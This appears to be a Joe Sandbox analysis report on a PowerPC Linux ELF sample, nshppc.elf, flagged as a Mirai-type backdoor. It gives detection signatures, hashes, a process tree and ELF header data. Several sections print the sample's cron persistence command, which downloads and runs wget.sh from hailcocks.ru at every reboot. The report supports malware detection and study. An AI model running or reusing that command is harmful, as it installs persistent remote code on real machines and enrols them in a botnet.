Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nshppc.elf

Overview

General Information

Sample name:nshppc.elf
Analysis ID:1542849
MD5:29a8d657f77fbbb6816b15a223770f27
SHA1:c13aee7d2d3856e6a12dff9e14e9cd1803623ca3
SHA256:d499423beedb16572846748e277aa66856b41f66a5ecaa08cfd1d00754a25f91
Tags:elfuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Reads system version information
Sample has stripped symbol table
Sample listens on a socket
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1542849
Start date and time:2024-10-26 19:05:45 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 19s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nshppc.elf
Detection:MAL
Classification:mal56.troj.linELF@0/1@0/0
  • Skipping network analysis since amount of network traffic is too extensive
  • VT rate limit hit for: nshppc.elf
Command:/tmp/nshppc.elf
PID:5711
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • nshppc.elf (PID: 5711, Parent: 5516, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/nshppc.elf
    • sh (PID: 5713, Parent: 5711, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 5719, Parent: 5713)
        • sh New Fork (PID: 5721, Parent: 5719)
        • crontab (PID: 5721, Parent: 5719, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 5720, Parent: 5713)
      • crontab (PID: 5720, Parent: 5713, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • systemd New Fork (PID: 5839, Parent: 1)
  • snap-failure (PID: 5839, Parent: 1, MD5: 69136a7d575731ce62349f2e4d3e5c36) Arguments: /usr/lib/snapd/snap-failure snapd
    • systemctl (PID: 5855, Parent: 5839, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop snapd.socket
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nshppc.elfReversingLabs: Detection: 21%
Source: tmp.5oUS4H.18.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: /tmp/nshppc.elf (PID: 5711)Socket: 127.0.0.1:1172Jump to behavior
Source: tmp.5oUS4H.18.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal56.troj.linELF@0/1@0/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5721)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 5720)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 5720)File: /var/spool/cron/crontabs/tmp.5oUS4HJump to behavior
Source: /usr/bin/crontab (PID: 5720)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/nshppc.elf (PID: 5713)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: /usr/lib/snapd/snap-failure (PID: 5855)Systemctl executable: /usr/bin/systemctl -> systemctl stop snapd.socketJump to behavior
Source: /usr/lib/snapd/snap-failure (PID: 5839)Reads version info: /proc/versionJump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/nshppc.elf (PID: 5885)Sleeps longer then 60s: 60.0sJump to behavior
Source: /tmp/nshppc.elf (PID: 5711)Queries kernel information via 'uname': Jump to behavior
Source: nshppc.elf, 5711.1.0000558c82996000.0000558c82a6b000.rw-.sdmp, nshppc.elf, 5722.1.0000558c82996000.0000558c82a6b000.rw-.sdmpBinary or memory string: !/etc/qemu-binfmt/ppc1
Source: nshppc.elf, 5711.1.0000558c82996000.0000558c82a6b000.rw-.sdmp, nshppc.elf, 5722.1.0000558c82996000.0000558c82a6b000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/ppc
Source: nshppc.elf, 5711.1.00007ffda4401000.00007ffda4422000.rw-.sdmp, nshppc.elf, 5722.1.00007ffda4401000.00007ffda4422000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc
Source: nshppc.elf, 5711.1.00007ffda4401000.00007ffda4422000.rw-.sdmp, nshppc.elf, 5722.1.00007ffda4401000.00007ffda4422000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-ppc/tmp/nshppc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nshppc.elf
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Systemd Service
1
Systemd Service
1
Virtualization/Sandbox Evasion
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job
1
Scheduled Task/Job
RootkitLSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt2
Scripting
Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
System Information Discovery
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1542849 Sample: nshppc.elf Startdate: 26/10/2024 Architecture: LINUX Score: 56 40 Multi AV Scanner detection for submitted file 2->40 9 nshppc.elf 2->9         started        11 systemd snap-failure 2->11         started        process3 process4 13 nshppc.elf sh 9->13         started        15 nshppc.elf 9->15         started        17 nshppc.elf 9->17         started        19 snap-failure systemctl 11->19         started        21 snap-failure 11->21         started        process5 23 sh crontab 13->23         started        27 sh 13->27         started        29 nshppc.elf 15->29         started        file6 38 /var/spool/cron/crontabs/tmp.5oUS4H, ASCII 23->38 dropped 42 Sample tries to persist itself using cron 23->42 44 Executes the "crontab" command typically for achieving persistence 23->44 31 sh crontab 27->31         started        34 nshppc.elf 29->34         started        signatures7 process8 signatures9 46 Executes the "crontab" command typically for achieving persistence 31->46 36 nshppc.elf 34->36         started        process10
SourceDetectionScannerLabelLink
nshppc.elf21%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://hailcocks.ru/wget.sh;tmp.5oUS4H.18.drfalse
    unknown
    No contacted IP infos
    No context
    No context
    No context
    No context
    No context
    Process:/usr/bin/crontab
    File Type:ASCII text
    Category:dropped
    Size (bytes):306
    Entropy (8bit):5.148371805764079
    Encrypted:false
    SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQ4MvZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJD:8QjHig8BJeHLUHYC+GABjnOGAFkz
    MD5:A46EE5CC7BBE5148D3200A7C38205950
    SHA1:1308DD3F6430A904C0351BFF40D267F7C2B04594
    SHA-256:11F2196F2BA7A0FE89B6C1B596D6CE94C2049EBFD24F6F396BA79E07936D12C8
    SHA-512:59ED6CCDC11E687F56127A415B9A2D66B672AD3C5B282DC41356381F3512EB659E7564FF2E0FF5799002627CE2D05B7FF2C90172DF1B8302D98257A41D7D892B
    Malicious:true
    Reputation:low
    Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Oct 26 12:07:23 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
    File type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
    Entropy (8bit):6.261580139211793
    TrID:
    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
    File name:nshppc.elf
    File size:76'308 bytes
    MD5:29a8d657f77fbbb6816b15a223770f27
    SHA1:c13aee7d2d3856e6a12dff9e14e9cd1803623ca3
    SHA256:d499423beedb16572846748e277aa66856b41f66a5ecaa08cfd1d00754a25f91
    SHA512:6a2432caa907ab6b17485d370bb969b1157f83984717cfe54bb9c4a387f5cdbe50bdd91c3569b9978f46ef3ff08f97ae6bfbef697f3cb6da32e63189acb540a9
    SSDEEP:1536:izoHQ6+He+UVslxw35ltV/LPrUolu8H2lqesNj3:i0n+Jz6lvPrdlMm3
    TLSH:55734C42B31C0947D1A75DF03A3F1BD083AFA99121E4FA84655FEB4A91B2E321586FCD
    File Content Preview:.ELF...........................4..(4.....4. ...(......................$L..$L..............$P..$P..$P......T.........dt.Q.............................!..|......$H...H......$8!. |...N.. .!..|.......?.........(`..../...@..\?.....$l.+../...A..$8...})....$lN..

    ELF header

    Class:ELF32
    Data:2's complement, big endian
    Version:1 (current)
    Machine:PowerPC
    Version Number:0x1
    Type:EXEC (Executable file)
    OS/ABI:UNIX - System V
    ABI Version:0
    Entry Point Address:0x100001f0
    Flags:0x0
    ELF Header Size:52
    Program Header Offset:52
    Program Header Size:32
    Number of Program Headers:3
    Section Header Offset:75828
    Section Header Size:40
    Number of Section Headers:12
    Header String Table Index:11
    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
    NULL0x00x00x00x00x0000
    .initPROGBITS0x100000940x940x240x00x6AX004
    .textPROGBITS0x100000b80xb80x1096c0x00x6AX004
    .finiPROGBITS0x10010a240x10a240x200x00x6AX004
    .rodataPROGBITS0x10010a480x10a480x1a040x00x2A008
    .ctorsPROGBITS0x100224500x124500x80x00x3WA004
    .dtorsPROGBITS0x100224580x124580x80x00x3WA004
    .dataPROGBITS0x100224680x124680x3440x00x3WA008
    .sdataPROGBITS0x100227ac0x127ac0x3c0x00x3WA004
    .sbssNOBITS0x100227e80x127e80x780x00x3WA004
    .bssNOBITS0x100228600x127e80x508c0x00x3WA004
    .shstrtabSTRTAB0x00x127e80x4b0x00x0001
    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
    LOAD0x00x100000000x100000000x1244c0x1244c6.30220x5R E0x10000.init .text .fini .rodata
    LOAD0x124500x100224500x100224500x3980x549c3.00590x6RW 0x10000.ctors .dtors .data .sdata .sbss .bss
    GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
    Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

    System Behavior

    Start time (UTC):17:07:23
    Start date (UTC):26/10/2024
    Path:/tmp/nshppc.elf
    Arguments:/tmp/nshppc.elf
    File size:5388968 bytes
    MD5 hash:ae65271c943d3451b7f026d1fadccea6

    Start time (UTC):17:07:23
    Start date (UTC):26/10/2024
    Path:/tmp/nshppc.elf
    Arguments:-
    File size:5388968 bytes
    MD5 hash:ae65271c943d3451b7f026d1fadccea6

    Start time (UTC):17:07:23
    Start date (UTC):26/10/2024
    Path:/bin/sh
    Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):17:07:23
    Start date (UTC):26/10/2024
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):17:07:23
    Start date (UTC):26/10/2024
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):17:07:23
    Start date (UTC):26/10/2024
    Path:/usr/bin/crontab
    Arguments:crontab -l
    File size:43720 bytes
    MD5 hash:66e521d421ac9b407699061bf21806f5

    Start time (UTC):17:07:23
    Start date (UTC):26/10/2024
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):17:07:23
    Start date (UTC):26/10/2024
    Path:/usr/bin/crontab
    Arguments:crontab -
    File size:43720 bytes
    MD5 hash:66e521d421ac9b407699061bf21806f5

    Start time (UTC):17:07:23
    Start date (UTC):26/10/2024
    Path:/tmp/nshppc.elf
    Arguments:-
    File size:5388968 bytes
    MD5 hash:ae65271c943d3451b7f026d1fadccea6

    Start time (UTC):17:07:23
    Start date (UTC):26/10/2024
    Path:/tmp/nshppc.elf
    Arguments:-
    File size:5388968 bytes
    MD5 hash:ae65271c943d3451b7f026d1fadccea6

    Start time (UTC):17:08:45
    Start date (UTC):26/10/2024
    Path:/tmp/nshppc.elf
    Arguments:-
    File size:5388968 bytes
    MD5 hash:ae65271c943d3451b7f026d1fadccea6

    Start time (UTC):17:08:45
    Start date (UTC):26/10/2024
    Path:/tmp/nshppc.elf
    Arguments:-
    File size:5388968 bytes
    MD5 hash:ae65271c943d3451b7f026d1fadccea6

    Start time (UTC):17:07:23
    Start date (UTC):26/10/2024
    Path:/tmp/nshppc.elf
    Arguments:-
    File size:5388968 bytes
    MD5 hash:ae65271c943d3451b7f026d1fadccea6

    Start time (UTC):17:08:02
    Start date (UTC):26/10/2024
    Path:/usr/lib/systemd/systemd
    Arguments:-
    File size:1620224 bytes
    MD5 hash:9b2bec7092a40488108543f9334aab75

    Start time (UTC):17:08:02
    Start date (UTC):26/10/2024
    Path:/usr/lib/snapd/snap-failure
    Arguments:/usr/lib/snapd/snap-failure snapd
    File size:4764904 bytes
    MD5 hash:69136a7d575731ce62349f2e4d3e5c36

    Start time (UTC):17:08:02
    Start date (UTC):26/10/2024
    Path:/usr/lib/snapd/snap-failure
    Arguments:-
    File size:4764904 bytes
    MD5 hash:69136a7d575731ce62349f2e4d3e5c36

    Start time (UTC):17:08:02
    Start date (UTC):26/10/2024
    Path:/usr/bin/systemctl
    Arguments:systemctl stop snapd.socket
    File size:996584 bytes
    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

    Start time (UTC):17:08:02
    Start date (UTC):26/10/2024
    Path:/usr/lib/snapd/snap-failure
    Arguments:-
    File size:4764904 bytes
    MD5 hash:69136a7d575731ce62349f2e4d3e5c36